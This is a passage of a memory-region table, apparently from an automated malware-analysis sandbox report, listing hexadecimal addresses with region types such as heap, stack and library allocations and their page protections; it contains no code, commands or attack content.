heap
|
page read and write
|
||
|
232392F2000
|
heap
|
page read and write
|
||
|
1DEED612000
|
trusted library allocation
|
page read and write
|
||
|
4A1F000
|
stack
|
page read and write
|
||
|
21F5B000
|
unclassified section
|
page execute and read and write
|
||
|
23238D3B000
|
heap
|
page read and write
|
||
|
2BE0000
|
heap
|
page readonly
|
||
|
8248000
|
heap
|
page read and write
|
||
|
6BAD000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
81F8000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
8AA000
|
heap
|
page read and write
|
||
|
81A4000
|
heap
|
page read and write
|
||
|
4AAB000
|
stack
|
page read and write
|
||
|
108A000
|
stack
|
page read and write
|
||
|
23238808000
|
heap
|
page read and write
|
||
|
23238C6F000
|
heap
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
8278000
|
heap
|
page read and write
|
||
|
23238DD0000
|
heap
|
page read and write
|
||
|
1FCDD4F0000
|
heap
|
page execute and read and write
|
||
|
23236F68000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2A79000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
49AE000
|
stack
|
page read and write
|
||
|
4448000
|
trusted library allocation
|
page read and write
|
||
|
23238DCB000
|
heap
|
page read and write
|
||
|
4664000
|
heap
|
page read and write
|
||
|
4F80000
|
trusted library allocation
|
page read and write
|
||
|
8C5B000
|
direct allocation
|
page execute and read and write
|
||
|
23238C05000
|
heap
|
page read and write
|
||
|
6EE000
|
unkown
|
page read and write
|
||
|
A10000
|
trusted library allocation
|
page read and write
|
||
|
4DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
891D000
|
heap
|
page read and write
|
||
|
23238C8D000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1DEED600000
|
trusted library allocation
|
page read and write
|
||
|
D25000
|
unkown
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
466F000
|
heap
|
page read and write
|
||
|
23238C53000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4B1D000
|
trusted library allocation
|
page read and write
|
||
|
1FCF5AA4000
|
heap
|
page read and write
|
||
|
1FCF5B18000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
23238BF3000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2B90000
|
trusted library allocation
|
page read and write
|
||
|
4E4F000
|
trusted library allocation
|
page read and write
|
||
|
5EE000
|
stack
|
page read and write
|
||
|
1FCF5AAC000
|
heap
|
page read and write
|
||
|
52E2000
|
unclassified section
|
page read and write
|
||
|
826D000
|
heap
|
page read and write
|
||
|
23238BF7000
|
heap
|
page read and write
|
||
|
83E0000
|
trusted library allocation
|
page read and write
|
||
|
4F12000
|
heap
|
page read and write
|
||
|
81E9000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
23238C28000
|
heap
|
page read and write
|
||
|
DD2323F000
|
stack
|
page read and write
|
||
|
23238D46000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
232387F7000
|
heap
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1DEED470000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
33AD000
|
heap
|
page read and write
|
||
|
20309000
|
direct allocation
|
page execute and read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2DD5000
|
heap
|
page read and write
|
||
|
23238EAA000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7167000
|
heap
|
page read and write
|
||
|
19CFE6E0000
|
heap
|
page read and write
|
||
|
4623000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
229C8000
|
unclassified section
|
page execute and read and write
|
||
|
33A7000
|
heap
|
page read and write
|
||
|
7FF887A70000
|
trusted library allocation
|
page read and write
|
||
|
8CE000
|
heap
|
page read and write
|
||
|
4629000
|
heap
|
page read and write
|
||
|
23238FA4000
|
heap
|
page read and write
|
||
|
201E0000
|
direct allocation
|
page execute and read and write
|
||
|
1FCF5B39000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
595B5C000
|
stack
|
page read and write
|
||
|
45F5000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1250000
|
heap
|
page read and write
|
||
|
DD22FFD000
|
stack
|
page read and write
|
||
|
2D98000
|
stack
|
page read and write
|
||
|
D3A97FE000
|
stack
|
page read and write
|
||
|
5FF000
|
heap
|
page read and write
|
||
|
1FD70000
|
remote allocation
|
page read and write
|
||
|
232387DB000
|
heap
|
page read and write
|
||
|
1FCDF339000
|
trusted library allocation
|
page read and write
|
||
|
84C0000
|
direct allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7FF887B60000
|
trusted library allocation
|
page read and write
|
||
|
726E000
|
stack
|
page read and write
|
||
|
2323873A000
|
heap
|
page read and write
|
||
|
DD231F8000
|
stack
|
page read and write
|
||
|
70000
|
unkown
|
page readonly
|
||
|
4DDE000
|
stack
|
page read and write
|
||
|
DD2418A000
|
stack
|
page read and write
|
||
|
D3AAFFE000
|
stack
|
page read and write
|
||
|
2323877A000
|
heap
|
page read and write
|
||
|
23238C8D000
|
heap
|
page read and write
|
||
|
2323878A000
|
heap
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B70000
|
trusted library allocation
|
page read and write
|
||
|
1FC3E000
|
stack
|
page read and write
|
||
|
2323940A000
|
heap
|
page read and write
|
||
|
1FB3F000
|
stack
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
4E7F000
|
stack
|
page read and write
|
||
|
81FB000
|
heap
|
page read and write
|
||
|
1FCDF365000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AE0000
|
trusted library allocation
|
page read and write
|
||
|
4B6E000
|
stack
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
1DEED60C000
|
trusted library allocation
|
page read and write
|
||
|
108A000
|
stack
|
page read and write
|
||
|
1FE7C000
|
stack
|
page read and write
|
||
|
7E0000
|
unkown
|
page readonly
|
||
|
733D000
|
stack
|
page read and write
|
||
|
7FF887A21000
|
trusted library allocation
|
page read and write
|
||
|
68AE000
|
stack
|
page read and write
|
||
|
23238C05000
|
heap
|
page read and write
|
||
|
2323880B000
|
heap
|
page read and write
|
||
|
23238C2D000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7FF887BA0000
|
trusted library allocation
|
page read and write
|
||
|
19CFE6A0000
|
heap
|
page read and write
|
||
|
A4F000
|
unkown
|
page read and write
|
||
|
232387F4000
|
heap
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
1FCDB84C000
|
heap
|
page read and write
|
||
|
23238C8D000
|
heap
|
page read and write
|
||
|
23238C77000
|
heap
|
page read and write
|
||
|
7172000
|
heap
|
page read and write
|
||
|
1FCDF335000
|
trusted library allocation
|
page read and write
|
||
|
8241000
|
heap
|
page read and write
|
||
|
1458000
|
heap
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
1FCDD9E4000
|
trusted library allocation
|
page read and write
|
||
|
8E632FB000
|
stack
|
page read and write
|
||
|
49EE000
|
stack
|
page read and write
|
||
|
23236D70000
|
heap
|
page read and write
|
||
|
8242000
|
heap
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
1FCDB88E000
|
heap
|
page read and write
|
||
|
1DE01590000
|
heap
|
page read and write
|
||
|
23238735000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
23238746000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
83D000
|
heap
|
page read and write
|
||
|
BB0000
|
unkown
|
page readonly
|
||
|
1020000
|
unkown
|
page readonly
|
||
|
81CD000
|
heap
|
page read and write
|
||
|
23238C59000
|
heap
|
page read and write
|
||
|
8510000
|
direct allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
D1E000
|
unkown
|
page readonly
|
||
|
2C2E000
|
stack
|
page read and write
|
||
|
23238D48000
|
heap
|
page read and write
|
||
|
232392E3000
|
heap
|
page read and write
|
||
|
23238C30000
|
heap
|
page read and write
|
||
|
21D2000
|
system
|
page execute and read and write
|
||
|
7FF887A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
1000FD000
|
stack
|
page read and write
|
||
|
863000
|
heap
|
page read and write
|
||
|
8E8000
|
heap
|
page read and write
|
||
|
23236F60000
|
heap
|
page read and write
|
||
|
53FC000
|
unclassified section
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
820F000
|
heap
|
page read and write
|
||
|
23238CD1000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
23238DD3000
|
heap
|
page read and write
|
||
|
BB0000
|
unkown
|
page readonly
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FDAE000
|
stack
|
page read and write
|
||
|
81D9000
|
heap
|
page read and write
|
||
|
472E000
|
stack
|
page read and write
|
||
|
4BFF000
|
stack
|
page read and write
|
||
|
39B0000
|
unkown
|
page execute and read and write
|
||
|
1FE80000
|
heap
|
page read and write
|
||
|
2323879B000
|
heap
|
page read and write
|
||
|
7E9D000
|
stack
|
page read and write
|
||
|
7FA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887BE0000
|
trusted library allocation
|
page read and write
|
||
|
23238C52000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B20000
|
trusted library allocation
|
page read and write
|
||
|
2B80000
|
trusted library allocation
|
page read and write
|
||
|
2015E000
|
heap
|
page read and write
|
||
|
D25000
|
unkown
|
page read and write
|
||
|
23238CB7000
|
heap
|
page read and write
|
||
|
2323879E000
|
heap
|
page read and write
|
||
|
1FCED84C000
|
trusted library allocation
|
page read and write
|
||
|
A05B000
|
direct allocation
|
page execute and read and write
|
||
|
4DE5000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238D4C000
|
heap
|
page read and write
|
||
|
1FCDD5E5000
|
trusted library allocation
|
page read and write
|
||
|
232392E8000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238C20000
|
heap
|
page read and write
|
||
|
22E0000
|
heap
|
page read and write
|
||
|
8BC0000
|
direct allocation
|
page execute and read and write
|
||
|
4626000
|
heap
|
page read and write
|
||
|
232392F9000
|
heap
|
page read and write
|
||
|
7FF887AB0000
|
trusted library allocation
|
page read and write
|
||
|
23238BF5000
|
heap
|
page read and write
|
||
|
2B84000
|
trusted library allocation
|
page read and write
|
||
|
1FCDDC12000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
232392E5000
|
heap
|
page read and write
|
||
|
6D00000
|
heap
|
page read and write
|
||
|
1FCDB89A000
|
heap
|
page read and write
|
||
|
4EC000
|
stack
|
page read and write
|
||
|
23238800000
|
heap
|
page read and write
|
||
|
23238723000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1340000
|
unkown
|
page read and write
|
||
|
D27000
|
unkown
|
page readonly
|
||
|
1FCDF45C000
|
trusted library allocation
|
page read and write
|
||
|
23238803000
|
heap
|
page read and write
|
||
|
23238BB5000
|
heap
|
page read and write
|
||
|
7EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
CC0000
|
unkown
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
96E000
|
stack
|
page read and write
|
||
|
3398000
|
heap
|
page read and write
|
||
|
232387A3000
|
heap
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
8590000
|
direct allocation
|
page read and write
|
||
|
23238EA0000
|
remote allocation
|
page read and write
|
||
|
DD22EFE000
|
stack
|
page read and write
|
||
|
8E62CF9000
|
stack
|
page read and write
|
||
|
118C000
|
stack
|
page read and write
|
||
|
4D54000
|
heap
|
page read and write
|
||
|
1FCDD290000
|
trusted library allocation
|
page read and write
|
||
|
4666000
|
heap
|
page read and write
|
||
|
7FF887870000
|
trusted library allocation
|
page read and write
|
||
|
1331000
|
unkown
|
page readonly
|
||
|
21E1000
|
system
|
page execute and read and write
|
||
|
710B000
|
heap
|
page read and write
|
||
|
559B000
|
trusted library allocation
|
page read and write
|
||
|
2323876E000
|
heap
|
page read and write
|
||
|
843E000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
B70000
|
unkown
|
page read and write
|
||
|
515E000
|
stack
|
page read and write
|
||
|
4C70000
|
trusted library allocation
|
page read and write
|
||
|
23236D9F000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4626000
|
heap
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
82CB000
|
heap
|
page read and write
|
||
|
23238CA5000
|
heap
|
page read and write
|
||
|
52D2000
|
direct allocation
|
page execute and read and write
|
||
|
23236CE0000
|
heap
|
page read and write
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
232387C2000
|
heap
|
page read and write
|
||
|
7FF887A52000
|
trusted library allocation
|
page read and write
|
||
|
51DC000
|
stack
|
page read and write
|
||
|
23238813000
|
heap
|
page read and write
|
||
|
7FF887B90000
|
trusted library allocation
|
page read and write
|
||
|
8E630FE000
|
stack
|
page read and write
|
||
|
1001FF000
|
unkown
|
page read and write
|
||
|
81C3000
|
heap
|
page read and write
|
||
|
4626000
|
heap
|
page read and write
|
||
|
1620000
|
unkown
|
page readonly
|
||
|
5B0000
|
unkown
|
page read and write
|
||
|
23238D49000
|
heap
|
page read and write
|
||
|
2BAA000
|
trusted library allocation
|
page execute and read and write
|
||
|
347E000
|
heap
|
page read and write
|
||
|
23238766000
|
heap
|
page read and write
|
||
|
232387D8000
|
heap
|
page read and write
|
||
|
7FF887926000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
8204000
|
heap
|
page read and write
|
||
|
23238C21000
|
heap
|
page read and write
|
||
|
23238D4D000
|
heap
|
page read and write
|
||
|
4AE9000
|
stack
|
page read and write
|
||
|
1FCDD250000
|
heap
|
page read and write
|
||
|
1DEEBC72000
|
heap
|
page read and write
|
||
|
23238DCB000
|
heap
|
page read and write
|
||
|
7EDE000
|
stack
|
page read and write
|
||
|
20530000
|
unclassified section
|
page execute and read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCDD260000
|
trusted library allocation
|
page read and write
|
||
|
72FE000
|
stack
|
page read and write
|
||
|
19CFE690000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4687000
|
trusted library allocation
|
page read and write
|
||
|
4DF8000
|
trusted library allocation
|
page read and write
|
||
|
4665000
|
heap
|
page read and write
|
||
|
430000
|
unkown
|
page readonly
|
||
|
4CF3000
|
trusted library allocation
|
page read and write
|
||
|
4610000
|
heap
|
page read and write
|
||
|
7141000
|
heap
|
page read and write
|
||
|
70000
|
unkown
|
page readonly
|
||
|
760000
|
heap
|
page read and write
|
||
|
CC0000
|
unkown
|
page read and write
|
||
|
8FF000
|
heap
|
page read and write
|
||
|
23238BFD000
|
heap
|
page read and write
|
||
|
1DEED700000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
DD2408E000
|
stack
|
page read and write
|
||
|
4FFF000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23236E5E000
|
heap
|
page read and write
|
||
|
7DF449260000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FABF000
|
stack
|
page read and write
|
||
|
23238C77000
|
heap
|
page read and write
|
||
|
44E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BAAC000
|
system
|
page read and write
|
||
|
1FCF59A0000
|
heap
|
page read and write
|
||
|
23238EA0000
|
remote allocation
|
page read and write
|
||
|
1FCDD3B2000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
43DE000
|
stack
|
page read and write
|
||
|
7210000
|
heap
|
page execute and read and write
|
||
|
7FF887AA0000
|
trusted library allocation
|
page read and write
|
||
|
1FCDDA12000
|
trusted library allocation
|
page read and write
|
||
|
4B1B000
|
trusted library allocation
|
page read and write
|
||
|
13E0000
|
unkown
|
page read and write
|
||
|
DD2363B000
|
stack
|
page read and write
|
||
|
23239310000
|
heap
|
page read and write
|
||
|
DD230FE000
|
stack
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
48AB000
|
stack
|
page read and write
|
||
|
4F5C000
|
stack
|
page read and write
|
||
|
8580000
|
direct allocation
|
page read and write
|
||
|
4528000
|
heap
|
page read and write
|
||
|
1360000
|
unkown
|
page readonly
|
||
|
6C6C000
|
stack
|
page read and write
|
||
|
43E0000
|
heap
|
page execute and read and write
|
||
|
5B36000
|
unclassified section
|
page read and write
|
||
|
232392E4000
|
heap
|
page read and write
|
||
|
8291000
|
heap
|
page read and write
|
||
|
4B2E000
|
stack
|
page read and write
|
||
|
1DEED7B3000
|
trusted library allocation
|
page read and write
|
||
|
232387D0000
|
heap
|
page read and write
|
||
|
7EE0000
|
heap
|
page read and write
|
||
|
23238CA0000
|
heap
|
page read and write
|
||
|
46EE000
|
stack
|
page read and write
|
||
|
2323931D000
|
heap
|
page read and write
|
||
|
1FCDB850000
|
heap
|
page read and write
|
||
|
2D5B000
|
stack
|
page read and write
|
||
|
23238BFD000
|
heap
|
page read and write
|
||
|
461C000
|
heap
|
page read and write
|
||
|
827D000
|
heap
|
page read and write
|
||
|
7FF887930000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCF58AF000
|
heap
|
page read and write
|
||
|
88BE000
|
stack
|
page read and write
|
||
|
840D000
|
stack
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
7FF887990000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCDBA50000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
232387E0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCDB846000
|
heap
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page read and write
|
||
|
1FCDD550000
|
heap
|
page execute and read and write
|
||
|
883E000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238782000
|
heap
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
23238C6F000
|
heap
|
page read and write
|
||
|
23238728000
|
heap
|
page read and write
|
||
|
2CB4000
|
heap
|
page read and write
|
||
|
33AD000
|
heap
|
page read and write
|
||
|
2A9B000
|
remote allocation
|
page execute and read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
FA000
|
stack
|
page read and write
|
||
|
4608000
|
heap
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
81DD000
|
heap
|
page read and write
|
||
|
5AE000
|
unkown
|
page read and write
|
||
|
74E000
|
stack
|
page read and write
|
||
|
23236DA0000
|
heap
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
5E7000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
DD2307F000
|
stack
|
page read and write
|
||
|
1FCDB7C0000
|
heap
|
page read and write
|
||
|
7FF88788B000
|
trusted library allocation
|
page read and write
|
||
|
528000
|
stack
|
page read and write
|
||
|
4666000
|
heap
|
page read and write
|
||
|
232387AE000
|
heap
|
page read and write
|
||
|
23236BE0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCDD3A0000
|
heap
|
page read and write
|
||
|
1FCDB800000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238BF7000
|
heap
|
page read and write
|
||
|
1FCDB7A0000
|
heap
|
page read and write
|
||
|
4591000
|
trusted library allocation
|
page read and write
|
||
|
1000000
|
unkown
|
page readonly
|
||
|
23238C59000
|
heap
|
page read and write
|
||
|
1620000
|
unkown
|
page readonly
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCED570000
|
trusted library allocation
|
page read and write
|
||
|
1FCDB9D0000
|
heap
|
page read and write
|
||
|
11C0000
|
unkown
|
page readonly
|
||
|
D1E000
|
unkown
|
page readonly
|
||
|
8520000
|
direct allocation
|
page read and write
|
||
|
2015A000
|
heap
|
page read and write
|
||
|
7FF887A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23236E69000
|
heap
|
page read and write
|
||
|
23238C94000
|
heap
|
page read and write
|
||
|
1340000
|
unkown
|
page read and write
|
||
|
1427000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
461C000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887873000
|
trusted library allocation
|
page execute and read and write
|
||
|
232392D8000
|
heap
|
page read and write
|
||
|
847C000
|
stack
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
1FCF5AE2000
|
heap
|
page read and write
|
||
|
7FF887AD0000
|
trusted library allocation
|
page read and write
|
||
|
33B2000
|
heap
|
page read and write
|
||
|
4C3E000
|
stack
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4770000
|
direct allocation
|
page read and write
|
||
|
23238C77000
|
heap
|
page read and write
|
||
|
1DEEBC50000
|
heap
|
page read and write
|
||
|
232387CA000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
D27000
|
unkown
|
page readonly
|
||
|
6AAD000
|
stack
|
page read and write
|
||
|
2C68000
|
heap
|
page read and write
|
||
|
23238756000
|
heap
|
page read and write
|
||
|
D1E000
|
unkown
|
page readonly
|
||
|
80000
|
unkown
|
page readonly
|
||
|
7340000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238771000
|
heap
|
page read and write
|
||
|
87FF000
|
stack
|
page read and write
|
||
|
4810000
|
heap
|
page read and write
|
||
|
2323931D000
|
heap
|
page read and write
|
||
|
232392D5000
|
heap
|
page read and write
|
||
|
1FCDD9D0000
|
trusted library allocation
|
page read and write
|
||
|
23238723000
|
heap
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page read and write
|
||
|
23238C77000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
204B1000
|
direct allocation
|
page execute and read and write
|
||
|
1FCDE7FD000
|
trusted library allocation
|
page read and write
|
||
|
1DEEBA55000
|
system
|
page execute and read and write
|
||
|
8160000
|
heap
|
page read and write
|
||
|
1DEEBC6A000
|
heap
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238C59000
|
heap
|
page read and write
|
||
|
1FCF5997000
|
heap
|
page read and write
|
||
|
2323931D000
|
heap
|
page read and write
|
||
|
890D000
|
heap
|
page read and write
|
||
|
DD234BE000
|
stack
|
page read and write
|
||
|
33B2000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4666000
|
heap
|
page read and write
|
||
|
1420000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2323931D000
|
heap
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
1FCDF326000
|
trusted library allocation
|
page read and write
|
||
|
1FCDDDFD000
|
trusted library allocation
|
page read and write
|
||
|
5541000
|
trusted library allocation
|
page read and write
|
||
|
1FCDE9B9000
|
trusted library allocation
|
page read and write
|
||
|
1DEEBC4A000
|
heap
|
page read and write
|
||
|
2FED000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
232392DD000
|
heap
|
page read and write
|
||
|
6C2E000
|
stack
|
page read and write
|
||
|
46FF000
|
stack
|
page read and write
|
||
|
2CA6000
|
heap
|
page read and write
|
||
|
23238C59000
|
heap
|
page read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
2323872C000
|
heap
|
page read and write
|
||
|
23238EA0000
|
remote allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4EFD000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7FF887B30000
|
trusted library allocation
|
page read and write
|
||
|
1DEED7C4000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
84E0000
|
direct allocation
|
page read and write
|
||
|
1FCF59C0000
|
heap
|
page read and write
|
||
|
23238BA1000
|
heap
|
page read and write
|
||
|
19CFEA20000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1DEEBBE0000
|
heap
|
page read and write
|
||
|
23236F6B000
|
heap
|
page read and write
|
||
|
1FCF5AB0000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
7FF887A80000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
2BB2000
|
trusted library allocation
|
page read and write
|
||
|
23238DD6000
|
heap
|
page read and write
|
||
|
4E9E000
|
stack
|
page read and write
|
||
|
23236CC0000
|
heap
|
page read and write
|
||
|
1020000
|
unkown
|
page readonly
|
||
|
3260000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
692E000
|
stack
|
page read and write
|
||
|
84D0000
|
direct allocation
|
page read and write
|
||
|
22F2000
|
unkown
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1DEEBA58000
|
system
|
page execute and read and write
|
||
|
1DE014F0000
|
heap
|
page read and write
|
||
|
1DEEBAF0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCDB866000
|
heap
|
page read and write
|
||
|
540000
|
unkown
|
page read and write
|
||
|
1FCDEE1E000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
47B0000
|
direct allocation
|
page read and write
|
||
|
1FC7F000
|
stack
|
page read and write
|
||
|
1DE01510000
|
heap
|
page read and write
|
||
|
4623000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
492E000
|
stack
|
page read and write
|
||
|
4430000
|
heap
|
page read and write
|
||
|
22E0000
|
heap
|
page read and write
|
||
|
7FF887920000
|
trusted library allocation
|
page read and write
|
||
|
232387E8000
|
heap
|
page read and write
|
||
|
1FCDD247000
|
heap
|
page execute and read and write
|
||
|
55BC000
|
unclassified section
|
page read and write
|
||
|
1DE017D0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
D25000
|
unkown
|
page read and write
|
||
|
1FCDD9EC000
|
trusted library allocation
|
page read and write
|
||
|
23238C16000
|
heap
|
page read and write
|
||
|
2B46000
|
unkown
|
page read and write
|
||
|
2323931D000
|
heap
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
844E000
|
stack
|
page read and write
|
||
|
19CFEA25000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
DD22E7D000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4683000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
4F83000
|
heap
|
page read and write
|
||
|
23238C59000
|
heap
|
page read and write
|
||
|
23238759000
|
heap
|
page read and write
|
||
|
4E1F000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FA7E000
|
stack
|
page read and write
|
||
|
4D7E000
|
stack
|
page read and write
|
||
|
23238C8F000
|
heap
|
page read and write
|
||
|
4860000
|
heap
|
page read and write
|
||
|
23238751000
|
heap
|
page read and write
|
||
|
1FCF58F4000
|
heap
|
page read and write
|
||
|
1FCF5957000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
232392D0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
6950000
|
heap
|
page execute and read and write
|
||
|
80DB000
|
stack
|
page read and write
|
||
|
23236E3A000
|
heap
|
page read and write
|
||
|
8907000
|
heap
|
page read and write
|
||
|
1DE01410000
|
heap
|
page read and write
|
||
|
2323874E000
|
heap
|
page read and write
|
||
|
23238BF3000
|
heap
|
page read and write
|
||
|
